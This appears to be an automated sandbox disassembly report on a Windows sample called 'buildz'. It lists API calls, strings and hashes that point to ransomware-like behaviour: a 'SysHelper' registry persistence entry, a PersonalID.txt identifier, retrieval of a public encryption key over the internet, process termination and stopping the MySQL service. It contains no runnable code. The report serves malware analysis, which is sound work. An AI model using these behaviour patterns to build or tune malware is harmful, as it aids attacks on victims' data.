                          • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memmove
                          • String ID: invalid string position$string too long
                          • API String ID: 4104443479-4289949731
                          • Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                          • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
                          • Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                          • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0040DAEB
                          • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
                          • lstrcpyW.KERNEL32(?,?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBD6
                          • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
                          • _memset.LIBCMT ref: 0040DC38
                          • CoUninitialize.OLE32 ref: 0040DC92
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                          • String ID: --Task$Comment$Time Trigger Task
                          • API String ID: 330603062-1376107329
                          • Opcode ID: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                          • Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
                          • Opcode Fuzzy Hash: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                          • Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54
                          APIs
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
                          • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
                          • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
                          • Sleep.KERNEL32(?), ref: 00411A75
                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
                          • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
                          • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                          • String ID: MYSQL
                          • API String ID: 2359367111-1651825290
                          • Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                          • Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
                          • Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                          • Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8
                          APIs
                          • std::exception::exception.LIBCMT ref: 0044F27F
                            • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                          • __CxxThrowException@8.LIBCMT ref: 0044F294
                            • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                          • std::exception::exception.LIBCMT ref: 0044F2AD
                          • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                          • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                            • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                          • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                          • std::exception::exception.LIBCMT ref: 0044F2FB
                          • __CxxThrowException@8.LIBCMT ref: 0044F310
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                          • String ID: bad function call
                          • API String ID: 2464034642-3612616537
                          • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                          • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
                          • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                          • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
                          APIs
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
                          • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
                          • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
                          • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide$ErrorLast
                          • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                          • API String ID: 1717984340-2085858615
                          • Opcode ID: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                          • Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
                          • Opcode Fuzzy Hash: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                          • Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                          • String ID:
                          • API String ID: 790675137-0
                          • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                          • Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
                          • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                          • Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D
                          APIs
                            • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                          • _fgetws.LIBCMT ref: 0040C7BC
                          • _memmove.LIBCMT ref: 0040C89F
                          • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateDirectory__wfsopen_fgetws_memmove
                          • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                          • API String ID: 2864494435-54166481
                          • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                          • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
                          • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                          • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                          • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                          • CloseHandle.KERNEL32(00000000), ref: 004124B7
                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                          • CloseHandle.KERNEL32(00000000), ref: 004124CD
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                          • String ID: cmd.exe
                          • API String ID: 2696918072-723907552
                          • Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                          • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                          • Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                          • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                          APIs
                          • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
                          • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: SHGetFolderPathW$Shell32.dll$\
                          • API String ID: 2574300362-2555811374
                          • Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                          • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                          • Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                          • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _malloc$__except_handler4_fprintf
                          • String ID: &#160;$Error encrypting message: %s$\\n
                          • API String ID: 1783060780-3771355929
                          • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                          • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
                          • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                          • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _strncmp
                          • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                          • API String ID: 909875538-2908105608
                          • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                          • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                          • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                          • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
                          • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                          • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                          • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                          • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseValue$OpenQuery
                          • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                          • API String ID: 3962714758-1667468722
                          • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                          • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                          • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                          • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
                          APIs
                          • _memset.LIBCMT ref: 0041E707
                            • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                          • InternetOpenW.WININET ref: 0041E743
                          • _wcsstr.LIBCMT ref: 0041E7AE
                          • _memmove.LIBCMT ref: 0041E838
                          • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
                          • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                          • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                          • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                          • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                          • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                          • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                          • _strstr.LIBCMT ref: 0041EA36
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                          • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                          • DeleteFileA.KERNEL32(?), ref: 0041EA82
                          • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                          • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                          • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                          • lstrlenA.KERNEL32(?), ref: 0041EAC8
                          • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                          • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                          • lstrlenA.KERNEL32(?), ref: 0041EB7C
                          • _malloc.LIBCMT ref: 0041EB86
                          • _memset.LIBCMT ref: 0041EB94
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                          • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                          • _strstr.LIBCMT ref: 0041EBDA
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                          • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                          • DeleteFileA.KERNEL32(?), ref: 0041EC32
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                          • String ID: bowsakkdestx.txt${"public_key":"
                          • API String ID: 2805819797-1771568745
                          • Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                          • Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
                          • Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                          • Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                          • API String ID: 1302938615-3129329331
                          • Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                          • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                          • Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                          • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                          APIs
                          • ___unDName.LIBCMT ref: 0043071B
                          • _strlen.LIBCMT ref: 0043072E
                          • __lock.LIBCMT ref: 0043074A
                          • _malloc.LIBCMT ref: 0043075C
                          • _malloc.LIBCMT ref: 0043076D
                          • _free.LIBCMT ref: 004307B6
                            • Part of subcall function 004242FD: IsProcessorFeaturePresent.KERNEL32(00000017,004242D1,i;B,?,?,00420CE9,0042520D,?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C), ref: 004242FF
                          • _free.LIBCMT ref: 004307AF
                            • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                            • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                          • String ID:
                          • API String ID: 3704956918-0
                          • Opcode ID: 491e64a43db57974c805febdf09b12bb5f9e435b923affe35b2a08799ec4d9db
                          • Instruction ID: 67f118bcdaa5faec8c00adc58c02bfbdeebce6865ed580ae06d436c8457e8144
                          • Opcode Fuzzy Hash: 491e64a43db57974c805febdf09b12bb5f9e435b923affe35b2a08799ec4d9db
                          • Instruction Fuzzy Hash: 3121DBB1A01715ABD7219B75D855B2FB7D4AF08314F90922FF4189B282DF7CE840CA98
                          APIs
                          • timeGetTime.WINMM ref: 00411B1E
                          • timeGetTime.WINMM ref: 00411B29
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
                          • DispatchMessageW.USER32(?), ref: 00411B5C
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
                          • Sleep.KERNEL32(00000064), ref: 00411B72
                          • timeGetTime.WINMM ref: 00411B78
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: MessageTimetime$Peek$DispatchSleep
                          • String ID:
                          • API String ID: 3697694649-0
                          • Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                          • Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
                          • Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                          • Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9
                          APIs
                          • __init_pointers.LIBCMT ref: 00425141
                            • Part of subcall function 00427D6C: EncodePointer.KERNEL32(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
                            • Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
                            • Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
                            • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
                            • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
                            • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
                            • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
                            • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
                            • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
                            • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
                            • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
                            • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
                            • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
                            • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
                            • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
                            • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
                            • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
                            • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1
                          • __mtinitlocks.LIBCMT ref: 00425146
                          • __mtterm.LIBCMT ref: 0042514F
                            • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
                            • Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
                            • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B
                          • __calloc_crt.LIBCMT ref: 00425174
                          • __initptd.LIBCMT ref: 00425196
                          • GetCurrentThreadId.KERNEL32 ref: 0042519D
                          Memory Dump Source
                          • Source File: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000002.00000002.2119606851.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000002.00000002.2119606851.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                          • String ID:
                          • API String ID: 3567560977-0
                          • Opcode ID: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                          • Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
                          • Opcode Fuzzy Hash: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                          • Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C
                          APIs
                          • __lock.LIBCMT ref: 0042594A
                            • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                            • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                            • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
